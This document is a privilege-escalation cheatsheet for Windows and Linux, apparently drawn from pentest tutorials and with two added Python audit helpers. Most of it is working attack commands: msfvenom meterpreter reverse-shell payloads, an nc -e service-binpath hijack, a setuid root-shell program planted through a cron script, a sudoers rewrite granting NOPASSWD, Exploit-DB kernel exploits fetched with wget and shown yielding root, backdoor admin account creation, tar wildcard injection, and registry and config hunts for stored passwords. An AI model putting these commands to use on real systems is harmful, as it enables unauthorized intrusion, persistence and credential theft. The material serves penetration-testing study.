Privilege Escalation Cheatsheet
Windows
Scripts
- JAWS
- Sherlock
- PowerUp
Kernel Exploits
systeminfo -> look up missing KBs
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
sherlock -> Find-AllVulns (PowerShell)
Common Kernel Exploits
- MS16-014 - applies to: Windows 7 SP1 x86
- MS16-016 - 'WebDAV' applies to Windows 7 SP1 x86 (Build 7601)
- MS16-032 - applies to: Windows 7 x86/x64, Windows 8 x86/64, Windows 10, Windows Server 2008-2012 R2
Config files
- creds in cleartext or base64, left behind once Windows is installed:
c:\sysprep.inf
c:\sysprep\sysprep.xml
%WINDIR%\Panther\Unattend\Unattended.xml
%WINDIR%\Panther\Unattended.xml
GPP (Group Policy Preferences)
Only applicable for devices connected to a domain
Groups.xml stored in SYSVOL
-> encrypted with AES on the DC, but the key is publicly known
\\dc2018.lab\SYSVOL\dc2008.lab\Policies\{id}\MACHINE\Preferences\Groups
Other Files
Services\Services.xml
ScheduledTasks\ScheduledTasks.xml
Printers\Printers.xml
Drives\Drives.xml
DataSources\DataSources.xml
Other Misc Passwords
dir /s *pass* == *cred* == *vnc* == *.config*
findstr /si password *.xml *.ini *.txt
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
web.config
php.ini
httpd.conf
access.log
- PowerUp: Get-WebConfig (IIS web.config)
putty:
reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions
Tight VNC:
reg query HKCU\Software\TightVNC\Server
vncpwd.exe <encrypted_password>
Always Install Elevated:
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
- both values = 1 -> create a malicious .msi file (with msfvenom, for example) and execute it with:
msiexec /quiet /qn /i <filename.msi>
PowerUp:
Get-RegistryAlwaysInstallElevated
Write-UserAddMSI
Unquoted Services Paths (trusted service paths)
For each space in an unquoted service path, Windows first tries to execute a program named after the part of the path before that space (with .exe appended) before moving on, so write access to a directory earlier in the path is what makes the service hijackable.
Example: for the service path C:\Program Files\Some Folder\Service.exe, Windows tries in order:
- C:\Program.exe
- C:\Program Files\Some.exe
- C:\Program Files\Some Folder\Service.exe
wmic service get name,displayname,pathname,startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
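The parsing rule above as an added audit helper (written for this page, not taken from PowerUp or the page's sources): given service entries in the columns returned by the wmic command, it computes the intermediate paths Windows would try for every unquoted auto-start service outside C:\Windows. The service list is a constructed sample; whether a reported directory is actually writable still has to be checked with icacls or accesschk.

```python
import re

def unquoted_candidates(image_path):
    """Executables Windows tries, in order, for an unquoted service path
    that contains spaces (CreateProcess splits on each space and appends
    .exe). Quoted paths, paths without spaces and non-.exe paths return []."""
    path = image_path.strip()
    if path.startswith('"'):
        return []                       # properly quoted: nothing to hijack
    # Keep only the binary: the path ends at the first ".exe" token,
    # anything after it is service arguments.
    m = re.match(r"(.*?\.exe)(?:\s|$)", path, re.IGNORECASE)
    if not m or " " not in m.group(1):
        return []
    exe = m.group(1)
    parts = exe.split(" ")
    candidates = [" ".join(parts[:i]) + ".exe" for i in range(1, len(parts))]
    candidates.append(exe)              # the real binary is found last
    return candidates

def audit_services(services):
    """services: (name, pathname, startmode) tuples, i.e. the columns of
    `wmic service get name,pathname,startmode`. Returns (name, probe paths)
    for auto-start services outside C:\\Windows with an unquoted path."""
    findings = []
    for name, pathname, startmode in services:
        if startmode.lower() != "auto":
            continue
        if pathname.lower().startswith("c:\\windows\\"):
            continue                    # same exclusion as the findstr filter
        cands = unquoted_candidates(pathname)
        if cands:
            findings.append((name, cands[:-1]))   # drop the real binary
    return findings

# Constructed sample; the PFNet entry mirrors the path discussed on this page.
SAMPLE_SERVICES = [
    ("PFNet", r"C:\Program Files (x86)\Privacyware\Privatefirewall 7.0\pfscv.exe", "Auto"),
    ("Spooler", r"C:\Windows\System32\spoolsv.exe", "Auto"),
    ("VMTools", r'"C:\Program Files\VMware\VMware Tools\vmtoolsd.exe"', "Auto"),
    ("BackupAgent", r"C:\Program Files\Acme Backup\agent.exe --service", "Manual"),
]

if __name__ == "__main__":
    for name, paths in audit_services(SAMPLE_SERVICES):
        print(name)
        for p in paths:
            print("  loader would try:", p)
```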
Example (PFNet service):
C:\Program Files (x86)\Privacyware\Privatefirewall 7.0\pfscv.exe
icacls "C:\Program Files (x86)\Privacyware"
msfvenom -p windows/meterpreter/reverse_https -e x86/shikata_ga_nai LHOST=10.0.0.100 LPORT=443 -f exe -o Privatefirewall.exe
Start and stop the service:
sc stop PFNet
sc start PFNet
PowerUp:
Get-ServiceUnquoted
Write-ServiceBinary -Name <service_name> -Path <hijack_path>
Insecure Service Permissions
- whoami -> net user <name> -> enumerate groups
- accesschk.exe (part of Sysinternals):
accesschk.exe -ucqv <service name>
accesschk.exe -uwcqv "Authenticated Users" * /accepteula
- Write access to a service as Authenticated User? On Windows XP, SSDPSRV and upnphost are writable by default:
sc qc upnphost
sc config upnphost binpath= "C:\nc.exe -nv 127.0.0.1 9988 -e C:\WINDOWS\System32\cmd.exe"
net start upnphost
PowerUp:
Get-ModifiableService
Test-ServiceDaclPermission
Invoke-ServiceAbuse -Name <service_name> -Command <command>
Weak folder permissions
DLL Hijacking
Requires user interaction / reboot.
DLL search order on 32-bit systems:
- The directory from which the application is loaded
- 32-bit System directory (C:\Windows\System32)
- 16-bit System directory (C:\Windows\System)
- Windows directory (C:\Windows)
- The current working directory
- Directories in the PATH environment variable
You can use procmon to look for hijackable DLLs with the following filters:
- Result is NAME NOT FOUND -> Include
- Path ends with .dll -> Include
echo %path%
icacls C:\Python27
accesschk.exe -dqv "C:\Python27"
sc qc IKEEXT
Generate a malicious payload with msfvenom:
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=<ip> lport=<port> -f dll > evil.dll
Windows 7 x86/x64:
- IKE and AuthIP IPsec Keying Modules (IKEEXT) -> wlbsctrl.dll
PowerUp:
Find-PathDLLHijack
Find-ProcessDLLHijack
Write-HijackDll
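The search order above, and the IKEEXT/wlbsctrl.dll case, as an added example written for this page (not PowerUp's code): it reproduces the loader's directory order for both SafeDllSearchMode settings and reports which user-writable directories would be probed before the real DLL (or, when the DLL is absent everywhere, at all). The PATH and the writable-directory list are constructed stand-ins for what echo %path% and icacls/accesschk -dqv would return.

```python
import ntpath

def dll_search_order(app_dir, cwd, path_env, safe_search=True, windir=r"C:\Windows"):
    """Directories the loader probes for a DLL that is neither already loaded
    nor a KnownDLL. safe_search=True is the SafeDllSearchMode default (the
    order listed above); False is the legacy order with the current
    directory in second place."""
    system_dirs = [ntpath.join(windir, "System32"), ntpath.join(windir, "System"), windir]
    path_dirs = [d for d in path_env.split(";") if d]
    if safe_search:
        return [app_dir] + system_dirs + [cwd] + path_dirs
    return [app_dir, cwd] + system_dirs + path_dirs

def hijack_points(dll_name, real_dir, search, writable_dirs):
    """Full DLL paths in user-writable directories that the loader would
    probe before reaching the real copy. real_dir=None means the DLL exists
    nowhere (procmon shows NAME NOT FOUND for every probe), so every writable
    directory in the search order counts."""
    writable = {ntpath.normcase(w) for w in writable_dirs}
    points = []
    for d in search:
        if real_dir is not None and ntpath.normcase(d) == ntpath.normcase(real_dir):
            break                       # loader stops here: real DLL found
        if ntpath.normcase(d) in writable:
            points.append(ntpath.join(d, dll_name))
    return points

# Constructed sample reproducing the page's IKEEXT case: svchost.exe runs from
# System32, wlbsctrl.dll is absent, and C:\Python27 on PATH is user-writable.
SAMPLE_PATH = r"C:\Windows\System32;C:\Windows;C:\Python27;C:\Program Files\Java\bin"
SAMPLE_WRITABLE = [r"C:\Python27"]     # what icacls / accesschk -dqv would report

def ikeext_example():
    order = dll_search_order(r"C:\Windows\System32", r"C:\Windows\System32", SAMPLE_PATH)
    return hijack_points("wlbsctrl.dll", None, order, SAMPLE_WRITABLE)

if __name__ == "__main__":
    for p in ikeext_example():
        print("user-writable probe before any real copy:", p)
```

Removing standard-user write access from every PATH directory the result names is the fix; the page's icacls and accesschk lines are how to confirm the current ACLs.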
Scheduled tasks:
On Server 2000, 2003 and XP, scheduled tasks run as SYSTEM. Are they calling any .exe's, and can you overwrite those?
accesschk.exe -dqv <folder path>
Can you create a task yourself?
net start "Task Scheduler"
at <hour:minute> /interactive "<path to evil exe>"
PowerUp:
Get-ModifiableScheduledTaskFile
Useful commands
hostname
echo %username%
whoami /priv
qwinsta -> other logged-in users
net users
net user <username>
net localgroup
net localgroup Administrators
net user rottenadmin P@ssword123! /add
net localgroup Administrators rottenadmin /add
ipconfig /all
route print
arp -a
netstat -ano
C:\WINDOWS\System32\drivers\etc\hosts
schtasks /query /fo LIST /v -> scheduled tasks
tasklist /SVC -> running processes
net start -> started services
cd\ & dir /b /s proof.txt
Linux
- not added -> ld_preload - URL
Scripts
Linux-Enum-Mod
linux-exploit-suggester
Kernel Exploits
uname -a
-> searchsploit
-> linux-exploit-suggester
Common Kernel Exploits
CVE-2010-2959
- 'CAN BCM' Privilege Escalation - Linux Kernel < 2.6.36-rc1 (Ubuntu 10.04 / 2.6.32)
wget -O i-can-haz-modharden.c http://www.exploit-db.com/download/14814
$ gcc i-can-haz-modharden.c -o i-can-haz-modharden
$ ./i-can-haz-modharden
[+] launching root shell!
# id
uid=0(root) gid=0(root)
CVE-2010-3904
- Linux RDS Exploit - Linux Kernel <= 2.6.36-rc8
CVE-2012-0056
- Mempodipper - Linux Kernel 2.6.39 < 3.2.2 (Gentoo / Ubuntu x86/x64)
wget -O exploit.c http://www.exploit-db.com/download/18411
gcc -o mempodipper exploit.c
./mempodipper
CVE-2016-5195
- Dirty Cow - Linux Privilege Escalation - Linux Kernel <= 3.19.0-73.8
echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD:ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update
Services running as root
ps aux | grep root
- any shell escape sequences?
SUID Executables
- runs with permissions of the owner
find / -perm -u=s -type f 2>/dev/null
- any shell escape sequences - do we have write access?
Sudo rights / users
sudo -l
- what can we execute -> any shell escape sequences
Cron jobs
find / -perm -2 -type f 2>/dev/null
ls -la /etc/cron.d
/* rootme.c: once made setuid root by the cron job below, it drops into a root shell */
#include <unistd.h>

int main(void)
{
    setgid(0);
    setuid(0);
    execl("/bin/sh", "sh", (char *)NULL);   /* argument list must be NULL-terminated */
    return 0;
}
gcc rootme.c -o rootme
echo "chown root:root /tmp/rootme; chmod u+s /tmp/rootme;" > /usr/local/sbin/cron-logrotate.sh
Wildcards
- often combined with user interaction / cronjobs
- cf. the "Back to the Future: Unix Wildcards Gone Wild" paper
- wildcards can be used to inject arbitrary options (and through them commands) by creating files whose names are parsed as command-line options
Example:
GNU tar: --checkpoint=<number> and --checkpoint-action=<command>
--checkpoint=1 and --checkpoint-action=exec=sh rshell.sh
Path Abuse ('.' in path)
Requires user interaction (e.g. somebody needs to have . in their PATH):
PATH=.:${PATH}
export PATH
echo $PATH
- replace executable files with a malicious one
Useful commands
ps aux | grep root
crontab -l
ifconfig -a
cat /etc/resolv.conf
netstat -tulpn
arp -e
route
id
who
cat /etc/passwd | cut -d: -f1 -> list of users
ls -la ~/.ssh
find . -name package.json -print -exec cat {} +
Sources
- https://www.fuzzysecurity.com/tutorials/16.html
- https://toshellandback.com/2015/11/24/ms-priv-esc/
- https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/
- https://www.sploitspren.com/2018-01-26-Windows-Privilege-Escalation-Guide/
- https://payatu.com/guide-linux-privilege-escalation/#
- https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
- https://github.com/sagishahar/lpeworkshop